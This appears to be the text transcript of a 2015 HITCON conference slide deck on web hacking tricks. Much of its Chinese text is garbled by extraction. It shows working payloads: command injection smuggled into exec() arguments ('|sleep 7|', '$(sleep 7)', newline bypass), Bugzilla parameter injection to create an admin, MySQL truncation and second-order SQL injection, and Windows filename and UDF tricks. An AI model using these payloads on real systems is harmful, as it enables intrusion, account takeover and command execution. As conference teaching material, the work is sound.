Upgrade to Pro — share decks privately, control downloads, hide ads and more …

那些 Web Hacking 中的奇技淫巧

Orange
August 28, 2015

那些 Web Hacking 中的奇技淫巧

HITCON 2015 Community 演講投影片

Orange

August 28, 2015
Tweet

More Decks by Orange

Other Decks in Technology

Transcript

  1. #DQWV/G • 蔡政達 a.k.a Orange • CHROOT 成員 / HITCON

    成員 / DEVCORE 資安顧問 • 國內外研討會 HITCON, AVTokyo, WooYun 等講師 • 國內外駭客競賽 Capture the Flag 冠軍 • 揭露過 Microsoft, Django, Yahoo, Facebook, Google 等弱 點漏洞 • 專精於駭客⼿手法、Web Security 與網路滲透 #90後 #賽棍 #電競選⼿手 #滲透師 #Web狗 #
  2. 第三⽅方內 容安全 前端 安全 DNS 安全 Web應⽤用 安全 Web框架 安全

    後端語⾔言 安全 Web伺服 器安全 資料庫 安全 作業系統 安全 XSS XXE SQL Injection CSRF
  3. 第三⽅方內 容安全 前端 安全 DNS 安全 Web應⽤用 安全 Web框架 安全

    後端語⾔言 安全 Web伺服 器安全 資料庫 安全 作業系統 安全 Struts2 OGNL RCE Rails YAML RCE PHP Memory UAF XSS UXSS Padding Oracle Padding Oracle XXE DNS Hijacking SQL Injection Length Extension Attack ShellShock HeartBleed JSONP Hijacking FastCGI RCE NPRE RCE OVERLAYFS Local Root CSRF Bit-Flipping Attack
  4. ⃮㋶䰿⃡緈䥥⻮㔬苌⛋㋶彍⃡緈䥥楫⚬ 第三⽅方內 容安全 前端 安全 DNS 安全 Web應⽤用 安全 Web框架

    安全 後端語⾔言 安全 Web伺服 器安全 資料庫 安全 作業系統 安全 ↛䥥瞗瓴
  5. @list = ( 'Ba', 'Ba', 'Banana'); $hash = { 'A'

    => 'Apple', 'B' => 'Banana', 'C' => @list }; print Dumper($hash); # ? $hash = { 'A' => 'Apple', 'B' => 'Banana', 'C' => 'Ba', 'Ba' => 'Banana' }; 2GTN嵿峡箞㌈
  6. @list = ( 'Ba', 'Ba', 'Banana'); $hash = { 'A'

    => 'Apple', 'B' => 'Banana', 'C' => @list }; print Dumper($hash); # wrong! $hash = { 'A' => 'Apple', 'B' => 'Banana', 'C' => ('Ba', 'Ba', 'Banana') }; 2GTN嵿峡箞㌈
  7. @list = ( 'Ba', 'Ba', 'Banana'); $hash = { 'A'

    => 'Apple', 'B' => 'Banana', 'C' => @list }; print Dumper($hash); # correct! $hash = { 'A' => 'Apple', 'B' => 'Banana', 'C' => 'Ba', 'Ba' => 'Banana' }; 2GTN嵿峡箞㌈
  8. $WI<KNNC%8' my $otheruser = Bugzilla::User->create( { login_name => $login_name, realname

    => $cgi->param('realname'), cryptpassword => $password }); # index.cgi? realname=xxx&realname=login_name&realname= admin
  9. 9KPFQYU箞㌈职㓱傓櫢㒪䠉椱┗ 儿職 • Windows API 檔名正規化特性 - shell.php # shel>.php

    # shell"php # shell.< • Windows Tilde 短檔名特性 - /backup/20150707_002dfa0f3ac08429.zip - /backup/201507~1.zip • Windows NTFS 特性 - download.php::$data
  10. ┊䠉06(5箞㌈儿職/[53. RNWIKPAFKT椱┗ • MySQL UDF 提權 - MySQL 5.1 -

    @@plugin_dir - Custom Dir -> System Dir -> Plugin Dir • 簡單說就是利⽤用 into outfile 建⽴立⺫⽬目錄 - INTO OUTFILE 'plugins::$index_allocation' - mkdir plugins
  11. for($i=0; $i<count($args); $i++){ if( !preg_match('/^\w+$/', $args[$i]) ){ exit(); } }

    exec("/sbin/resize $args[0] $args[1] $args[2]"); /resize.php ?arg[0]=uid.jpg &arg[1]=800 &arg[2]=600
  12. for($i=0; $i<count($args); $i++){ if( !preg_match('/^\w+$/', $args[$i]) ){ exit(); } }

    exec("/sbin/resize $args[0] $args[1] $args[2]"); /resize.php ?arg[0]=uid.jpg|sleep 7| &arg[1]=800;sleep 7; &arg[2]=600$(sleep 7)
  13. for($i=0; $i<count($args); $i++){ if( !preg_match('/^\w+$/', $args[$i]) ){ exit(); } }

    exec("/sbin/resize $args[0] $args[1] $args[2]"); /resize.php ?arg[0]=uid.jpg%0A &arg[1]=sleep &arg[2]=7%0A
  14. ; Patch from 80sec if ($fastcgi_script_name ~ ..*/.*php) { return

    403; } ㎦⭤ⅭℬⅭ http://www.80sec.com/nginx-securit.html
  15. $name = $_POST['name']; $r = query('SELECT * FROM users WHERE

    name=?', $name); if (count($r) > 0){ die('duplicated name'); } else { query('INSERT INTO users VALUES(?, ?)', $name, $pass); die('registed'); } // CREATE TABLE users(id INT, name VARCHAR(255), ...)
  16. mysql> CREATE TABLE users ( -> id INT, -> name

    VARCHAR(255), -> pass VARCHAR(255) -> ); Query OK, 0 rows affected (0.00 sec) mysql> INSERT INTO users VALUES(1, 'admin', 'pass'); Query OK, 1 row affected (0.00 sec) mysql> INSERT INTO users VALUES(2, 'admin ... x', 'xxd'); Query OK, 1 row affected, 1 warning (0.00 sec) mysql> SELECT * FROM users WHERE name='admin'; +------+------------------+------+ | id | name | pass | +------+------------------+------+ | 1 | admin | pass | | 2 | admin | xxd | +------+------------------+------+ 2 rows in set (0.00 sec)
  17. $name = $_POST['name']; if (strlen($name) > 16) die('name too long');

    $r = query('SELECT * FROM users WHERE name=?', $name); if (count($r) > 0){ die('duplicated name'); } else { query('INSERT INTO users VALUES(?, ?)', $name, $pass); die('registed'); } // CREATE TABLE users(id INT, name VARCHAR(255), ...) DEFAULT CHARSET=utf8
  18. mysql> CREATE TABLE users ( -> id INT, -> name

    VARCHAR(255), -> pass VARCHAR(255) -> ) DEFAULT CHARSET=utf8; Query OK, 0 rows affected (0.00 sec) mysql> INSERT INTO users VALUES(1, 'admin', 'pass'); Query OK, 1 row affected (0.01 sec) mysql> INSERT INTO users VALUES(2, 'adminx', 'xxd'); Query OK, 1 row affected, 1 warning (0.00 sec) mysql> SELECT * FROM users WHERE name='admin'; +------+-------+------+ | id | name | pass | +------+-------+------+ | 1 | admin | pass | | 2 | admin | xxd | +------+-------+------+ 2 rows in set (0.00 sec)
  19. $uid = $_GET['uid']; if ( is_numeric($uid) ) query("INSERT INTO blacklist

    VALUES($uid)"); $uids = query("SELECT uid FROM blacklist"); foreach ($uids as $uid) { show( query("SELECT log FROM logs WHERE uid=$uid") ); } // CREATE TABLE blacklist(id TEXT, uid TEXT, ...)
  20. $uid = $_GET['uid']; if ( is_numeric($uid) ) query("INSERT INTO blacklist

    VALUES($uid)"); $uids = query("SELECT uid FROM blacklist"); foreach ($uids as $uid) { show( query("SELECT log FROM logs WHERE uid=$uid") ); } // uid=0x31206f7220313d31 # 1 or 1=1
  21. • workers.properti es - worker.ajp1.port= 8009 - worker.ajp1.host= 127.0.0.1 -

    worker.ajp1.type= ajp13 • uriworkermap.pro perties - /sub/*=ajp1 - /sub=ajp1
  22. • HITCON 2014 CTF - 2 / 1020 解出 •

    舊版 ColdFusion 漏洞 - ColdFusion with Apache Connector - 舊版本 ColdFusion Double Encoding 造成資訊洩漏 漏洞